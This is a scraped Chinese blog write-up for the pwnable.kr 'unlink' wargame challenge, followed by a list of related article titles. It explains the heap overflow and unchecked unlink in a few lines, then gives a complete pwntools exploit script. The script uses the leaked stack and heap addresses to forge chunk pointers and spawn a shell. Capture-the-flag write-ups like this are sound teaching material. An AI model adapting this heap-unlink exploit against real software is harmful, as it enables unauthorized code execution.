pwnable之unlink
来源:互联网 发布:北京行知实践园作文 编辑:程序博客网 时间:2024/06/08 18:51
问题分析
程序自己写了一个实现unlink的程序,没有任何check,并且存在堆溢出
经典的unlink attack,这里就不介绍了。
//unlinkbk_chunk = p->bkfd_chunk = p->fdbk_chunk->fd = fd_chunkfd_chunk->bk = bk_chunk
solv.py
from pwn import *context.log_level = 'debug'context.arch = 'i386'cn = ssh(host='pwnable.kr',port=2222,user='unlink',password='guest')p = cn.process('./unlink')elf = ELF('unlink')shell_addr = elf.symbols['shell']#gdb.attach(p,'b unlink\n')p.recvuntil('here is stack address leak: ')stack_leak = p.recvuntil('\n')[:-1]p.recvuntil('here is heap address leak: ')heap_leak = p.recvuntil('\n')[:-1]stack_leak = int(stack_leak,16)heap_leak = int(heap_leak,16)log.info("stack leak {}".format(hex(stack_leak)))log.info("heap leak {}".format(hex(heap_leak)))stack2_addr = stack_leak + 0x14 - 0x8heap2_addr = heap_leak + 0xcpayload = p32(shell_addr) + 'aaaa' * 3 + p32(stack2_addr) + p32(heap2_addr) #raw_input('send payload')p.sendline(payload)p.interactive()
阅读全文
0 0
- pwnable之unlink
- pwnable之unlink
- pwnable.kr writeup之unlink
- 全面剖析Pwnable.kr unlink
- pwnable之coin1
- pwnable之blackjack
- pwnable.kr 之fd
- pwnable.kr之bof
- pwnable.kr之flag
- pwnable.kr之passcode
- pwnable.kr之random
- pwnable.kr之shellshock
- pwnable.kr之mistake
- pwnable.kr之input
- pwnable.kr之lotto
- pwnable.kr之cmd1
- pwnable.kr之blackjack
- pwnable.kr之uaf
- c++知识点----定义抽象基类(纯虚函数)
- Common Subsequence dp
- 前端面试必问
- thinkphp小细节
- 五子棋的简单实现
- pwnable之unlink
- java多线程——并发测试
- docker高级应用之cpu与内存资源限制(转)
- springMVC的注解@RequestParam与@PathVariable的区别
- Hessian 配置时遇到的浏览器报500错误
- js对象、数组深复制
- / Vijos / 题库 / 选课 P1180
- synchronous错误使用
- Unicode和UTF-8有何区别?